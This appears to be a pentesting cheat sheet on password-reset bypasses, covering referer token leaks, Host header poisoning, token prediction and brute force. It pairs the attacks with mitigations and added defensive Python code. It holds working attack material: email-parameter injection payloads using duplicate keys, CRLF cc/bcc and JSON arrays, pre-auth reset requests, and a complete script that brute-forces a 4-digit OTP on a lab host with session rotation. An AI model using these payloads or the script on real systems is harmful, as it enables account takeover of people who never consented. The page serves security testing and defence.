Reset/Forgotten Password Bypass
Password Reset Token Leak Via Referrer
- The HTTP referer header may leak the password reset token if it's included in the URL. This can occur when a user clicks on a third-party website link after requesting a password reset.
- Impact: Potential account takeover via Cross-Site Request Forgery (CSRF) attacks.
- Exploitation: To check whether the password reset token leaks in the referer header, request a password reset for your own email address and click the reset link you receive. Do not change your password right away. Instead, navigate to a third-party website (such as Facebook or Twitter) while capturing the requests with Burp Suite. Inspect the requests to see whether the referer header contains the password reset token, since this could expose sensitive information to third parties.
- References:
- HackerOne Report 342693
- HackerOne Report 272379
- Password Reset Token Leak Article
Password Reset Poisoning
- Attackers can manipulate the Host header during password reset requests to point the reset link at a malicious site.
- Impact: Can lead to account takeover by leaking reset tokens to attackers.
- Mitigation Steps:
- Validate the Host header against a whitelist of allowed domains.
- Use secure, server-side methods to generate absolute URLs.
- Patch: Use $_SERVER['SERVER_NAME'] to construct password reset URLs instead of $_SERVER['HTTP_HOST'].
- References:
- Acunetix Article on Password Reset Poisoning
Password Reset By Manipulating Email Parameter
Attackers can manipulate the password reset request by adding extra email parameters to divert the reset link.
- Add the attacker's email as a second parameter using &
POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
- Add the attacker's email as a second parameter using %20
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
- Add the attacker's email as a second parameter using |
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
- Add the attacker's email as a second parameter using cc
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
- Add the attacker's email as a second parameter using bcc
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
- Add the attacker's email as a second parameter using ,
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
- Add the attacker's email as a second parameter in a JSON array
POST /resetPassword
[...]
{"email":["victim@mail.tld","attacker@mail.tld"]}
- Mitigation Steps:
- Properly parse and validate the email parameters server-side.
- Use prepared statements or parameterized queries to prevent injection attacks.
- References:
- https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
- https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
- https://twitter.com/HusseiN98D/status/1254888748216655872
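Server-side validation that defeats every payload shape listed above, as an added example that is not part of the original page: duplicate keys, embedded separators, CR/LF header injection and JSON arrays are all rejected, and exactly one well-formed address is returned. The function and exception names are assumptions for the demo.

```python
import json
import re
from urllib.parse import parse_qs

# Strict on purpose: one local part, one '@', a dotted domain, nothing else.
_EMAIL_RE = re.compile(r"^[A-Za-z0-9._+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


class InvalidResetRequest(ValueError):
    pass


def _single_address(value: str) -> str:
    # Block header injection (CR/LF) and every multi-recipient separator
    # before the value can reach the mailer.
    if any(c in value for c in "\r\n,|;<>\"' \t"):
        raise InvalidResetRequest("separator or control character in email")
    if len(value) > 254 or not _EMAIL_RE.fullmatch(value):
        raise InvalidResetRequest("malformed email")
    return value.lower()


def extract_reset_email(body: str, content_type: str) -> str:
    """Return the single address a reset mail may go to, or raise."""
    if content_type.startswith("application/json"):
        data = json.loads(body)
        value = data.get("email") if isinstance(data, dict) else None
        if not isinstance(value, str):        # rejects ["victim", "attacker"]
            raise InvalidResetRequest("email must be a single string")
        return _single_address(value)
    if content_type.startswith("application/x-www-form-urlencoded"):
        # parse_qs keeps every repeated key, so email=a&email=b shows up as two values
        values = parse_qs(body, keep_blank_values=True).get("email", [])
        if len(values) != 1:
            raise InvalidResetRequest("email must appear exactly once")
        return _single_address(values[0])
    raise InvalidResetRequest("unsupported content type")
```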
Changing Email and Password of Any User via API Parameters
- Attackers can modify the email and password parameters in API requests to change account credentials.
POST /api/changepass
[...]
{"form": {"email":"victim@email.tld","password":"12345678"}}
- Mitigation Steps:
- Enforce strict parameter validation and authentication checks.
- Implement robust logging and monitoring to detect and respond to suspicious activity.
- Reference:
- Full Account Takeover via API Parameter Manipulation
No Rate Limiting: Email Bombing
- A lack of rate limiting on password reset requests can lead to email bombing, overwhelming the user with reset emails.
- Mitigation Steps:
- Implement rate limiting based on IP address or user account.
- Use CAPTCHA to prevent automated abuse.
- References:
- HackerOne Report 280534
Find Out How the Password Reset Token Is Generated
- Understanding the pattern or method used to create the token can lead to predicting or brute-forcing it. Some options:
- Based on Timestamp
- Based on UserID
- Based on user email
- Based on Firstname and Lastname
- Based on Date of Birth
- Based on Cryptography
- Mitigation Steps:
- Use strong cryptographic methods for token generation.
- Ensure sufficient randomness and length to prevent predictability.
- Tools: Use Burp Sequencer to analyze the randomness of tokens.
Guessable UUID
- If UUIDs (version 1) are guessable or predictable, attackers may brute-force them to generate valid reset tokens. Check:
- Mitigation Steps:
- Use GUID version 4 for randomness, or implement additional security measures for other versions.
- Tools: Use guidtool to analyze and generate GUIDs.
Response Manipulation: Replace Bad Response With Good One
- Manipulating HTTP responses to bypass error messages or restrictions.
- Mitigation Steps:
- Implement server-side checks to ensure response integrity.
- Use secure communication channels such as HTTPS to prevent man-in-the-middle attacks.
- Reference:
- Critical Bug in Live Bug Bounty Event
Using an Expired Token
- Testing whether expired tokens can still be used for password reset.
- Mitigation Steps:
- Implement strict token expiration policies and validate token expiration server-side.
Brute Force Password Reset Token
- Attempting to brute-force the reset token using tools such as Burp Suite and IP-Rotator to bypass IP-based rate limits.
- Mitigation Steps:
- Implement robust rate-limiting and account lockout mechanisms.
- Monitor for suspicious activity indicative of brute-force attacks.
Try Using Your Own Token
- Testing whether an attacker's reset token can be used together with the victim's email.
- Mitigation Steps:
- Ensure tokens are bound to the user session or other user-specific attributes.
Session Invalidation on Logout/Password Reset
- Ensuring sessions are invalidated when a user logs out or resets their password.
- Mitigation Steps:
- Implement proper session management, ensuring all sessions are invalidated on logout or password reset.
Reset Token Expiration Time
- Reset tokens should have an expiration time after which they become invalid.
- Mitigation Steps:
- Set a reasonable expiration time for reset tokens and enforce it strictly server-side.
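One reset-token store that covers the token generation, expired-token, own-token and expiration sections above, as an added example that is not from the original page: tokens come from the OS CSPRNG, only a hash is stored, each token is bound to one user, expires, is single-use and is superseded when a newer one is issued. Class, method names and the 15-minute lifetime are assumptions.

```python
import hashlib
import secrets
import time
from typing import Dict, Optional

TOKEN_TTL_SECONDS = 15 * 60   # assumed lifetime; pick what the application needs


class ResetTokenStore:
    """In-memory store for the demo; a real deployment keeps the same fields in a DB."""

    def __init__(self) -> None:
        # sha256(token) -> {"user": ..., "expires": ..., "used": ...}
        self._records: Dict[str, dict] = {}

    @staticmethod
    def _fingerprint(token: str) -> str:
        # Only a hash is persisted, so a leaked table cannot be replayed as tokens.
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user_id: str, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        # Supersede every earlier token for this user: one live token at a time.
        for rec in self._records.values():
            if rec["user"] == user_id:
                rec["used"] = True
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG, not a UUID or timestamp
        self._records[self._fingerprint(token)] = {
            "user": user_id, "expires": now + TOKEN_TTL_SECONDS, "used": False}
        return token

    def redeem(self, token: str, user_id: str, now: Optional[float] = None) -> bool:
        """True exactly once, only for the bound user, only before expiry."""
        now = time.time() if now is None else now
        rec = self._records.get(self._fingerprint(token))
        if rec is None or rec["used"] or now >= rec["expires"]:
            return False
        if rec["user"] != user_id:
            return False                    # attacker's token + victim's account fails
        rec["used"] = True                  # single use; revoke live sessions at this point too
        return True
```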
OTP rate limit bypass by changing your session
- If the website uses the user's session to track failed OTP attempts and the OTP is weak (<= 4 digits), then we can effectively brute-force the OTP.
- Exploitation:
- Just request a new session token after being rejected by the server.
- Example code exploiting this bug by guessing the OTP at random (when you change the session the OTP changes too, so we cannot brute-force it sequentially!):
# Authentication bypass by password reset
# by coderMohammed
import requests
import random
from time import sleep

headers = {
    "User-Agent": "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1",
    "Cookie": "PHPSESSID=mrerfjsol4t2ags5ihvvb632ea"
}
url = "http://10.10.12.231:1337/reset_password.php"
logout = "http://10.10.12.231:1337/logout.php"
root = "http://10.10.12.231:1337/"
parms = dict()
ter = 0
phpsessid = ""

print("[+] Starting attack!")
sleep(3)
print("[+] This might take around 5 minutes to finish!")
try:
    while True:
        parms["recovery_code"] = f"{random.randint(0, 9999):04}"  # random 4-digit code from 0000 to 9999
        parms["s"] = 164  # not important, it only affects the frontend
        res = requests.post(url, data=parms, allow_redirects=True, verify=False, headers=headers)
        if ter == 8:  # number of tries made with the current session
            out = requests.get(logout, headers=headers)  # log the current session out
            mainp = requests.get(root)  # gets another PHPSESSID (token)
            cookies = out.cookies  # extract the session id
            phpsessid = cookies.get('PHPSESSID')
            headers["Cookie"] = f"PHPSESSID={phpsessid}"  # update the headers with the new session (the header name is "Cookie")
            reset = requests.post(url, data={"email": "tester@hammer.thm"}, allow_redirects=True, verify=False, headers=headers)  # re-request the reset email for the target account under the new session
            ter = 0  # reset ter so we get a new session after another 8 tries
        else:
            ter += 1
        if len(res.text) == 2292:  # length of the page when the recovery code was accepted (found by testing)
            print(len(res.text))  # for debug info
            print(phpsessid)
            reset_data = {  # here we change the password to something new
                "new_password": "D37djkamd!",
                "confirm_password": "D37djkamd!"
            }
            reset2 = requests.post(url, data=reset_data, allow_redirects=True, verify=False, headers=headers)
            print("[+] Password has been changed to: D37djkamd!")
            break
except Exception as e:
    print("[+] Attack stopped")
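The fix for the flaw the script above relies on is to count failed attempts per account under recovery rather than per session cookie; the following is an added example, not code from the original page or the target application, and the class name, 6-digit code, 5-attempt limit and 10-minute lifetime are assumptions.

```python
import secrets
import time
from typing import Dict, Optional

MAX_ATTEMPTS = 5            # assumed policy values
OTP_TTL_SECONDS = 10 * 60


class AccountKeyedOtp:
    """Attempt counter keyed on the account being recovered, never on the
    caller's session, so dropping or swapping the session does not reset it."""

    def __init__(self) -> None:
        self._state: Dict[str, dict] = {}

    def issue(self, account: str, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        code = f"{secrets.randbelow(10 ** 6):06d}"      # 6 digits from the CSPRNG
        prev = self._state.get(account)
        # Re-requesting a code inside the live window keeps the attempt count,
        # so "send me a new OTP" cannot be used to clear the counter either.
        attempts = prev["attempts"] if prev and now < prev["expires"] else 0
        self._state[account] = {"code": code, "expires": now + OTP_TTL_SECONDS,
                                "attempts": attempts}
        return code

    def verify(self, account: str, candidate: str, now: Optional[float] = None) -> bool:
        now = time.time() if now is None else now
        st = self._state.get(account)
        if st is None or now >= st["expires"]:
            return False
        if st["attempts"] >= MAX_ATTEMPTS:
            return False                                # locked until the window expires
        if secrets.compare_digest(st["code"].encode(), candidate.encode()):
            del self._state[account]                    # single use; clears the counter
            return True
        st["attempts"] += 1
        return False
```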
Arbitrary password reset via skipOldPwdCheck (pre-auth)
Some implementations expose a password-change action that calls the password-change routine with skipOldPwdCheck=true and validates neither a reset token nor ownership. If the endpoint accepts an action parameter such as change_password together with a username and new password in the request body, an attacker can reset any account pre-auth.
Vulnerable example (PHP):
// hub/rpwd.php
RequestHandler::validateCSRFToken();
$RP = new RecoverPwd();
$RP->process($_REQUEST, $_POST);

// modules/Users/RecoverPwd.php
if ($request['action'] == 'change_password') {
    $body = $this->displayChangePwd($smarty, $post['user_name'], $post['confirm_new_password']);
}

public function displayChangePwd($smarty, $username, $newpwd) {
    $current_user = CRMEntity::getInstance('Users');
    $current_user->id = $current_user->retrieve_user_id($username);
    // ... criteria checks omitted ...
    $current_user->change_password('oldpwd', $_POST['confirm_new_password'], true, true); // skipOldPwdCheck=true
    emptyUserAuthtokenKey($this->user_auth_token_type, $current_user->id);
}
Exploitation request (hypothetical):
POST /hub/rpwd.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=change_password&user_name=admin&confirm_new_password=NewP@ssw0rd!
Mitigations:
- Always require a valid, time-limited reset token bound to the account and session before changing a password.
- Do not expose skipOldPwdCheck paths to unauthenticated users; require authentication for normal password changes and verify the old password.
- Invalidate all active sessions and reset tokens after a password change.
Registration-as-Password-Reset (Upsert on Existing Email)
Some applications implement the signup handler as an upsert. If the email already exists, the handler silently updates the user record instead of rejecting the request. When the registration endpoint accepts a minimal JSON body with an existing email and a new password, it effectively becomes a pre-auth password reset with no ownership check, allowing full account takeover.
Pre-auth ATO PoC (overwriting an existing user's password):
POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json
{"email":"victim@example.com","password":"New@12345"}
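The upsert pattern beside its insert-only replacement, as an added example that is not code from the original page or the affected application: the hardened handler leaves an existing account untouched and answers identically either way, so it neither resets passwords nor enumerates accounts. Function names, the sqlite3 schema and the placeholder hashing are assumptions.

```python
import hashlib
import secrets
import sqlite3
from typing import Optional


def _hash_password(pw: str) -> str:
    # Placeholder for the demo; use argon2 or bcrypt in production.
    salt = secrets.token_hex(8)
    return salt + ":" + hashlib.sha256((salt + pw).encode()).hexdigest()


def open_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (email TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    return db


def register_upsert(db: sqlite3.Connection, email: str, password: str) -> str:
    """The flawed pattern: an existing email silently gets its password replaced."""
    db.execute("INSERT INTO users(email, pw_hash) VALUES(?, ?) "
               "ON CONFLICT(email) DO UPDATE SET pw_hash = excluded.pw_hash",
               (email, _hash_password(password)))
    return "ok"


def register_insert_only(db: sqlite3.Connection, email: str, password: str) -> str:
    """Hardened: insert only. A conflict changes nothing, and the response is the
    same in both cases, so the endpoint neither resets nor enumerates accounts."""
    try:
        db.execute("INSERT INTO users(email, pw_hash) VALUES(?, ?)",
                   (email, _hash_password(password)))
    except sqlite3.IntegrityError:
        pass    # existing account untouched; optionally notify its owner out of band
    return "ok"


def password_hash_of(db: sqlite3.Connection, email: str) -> Optional[str]:
    row = db.execute("SELECT pw_hash FROM users WHERE email = ?", (email,)).fetchone()
    return row[0] if row else None
```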
References
- https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token
- https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/
- How I Discovered a Critical Password Reset Flaw (Registration upsert ATO)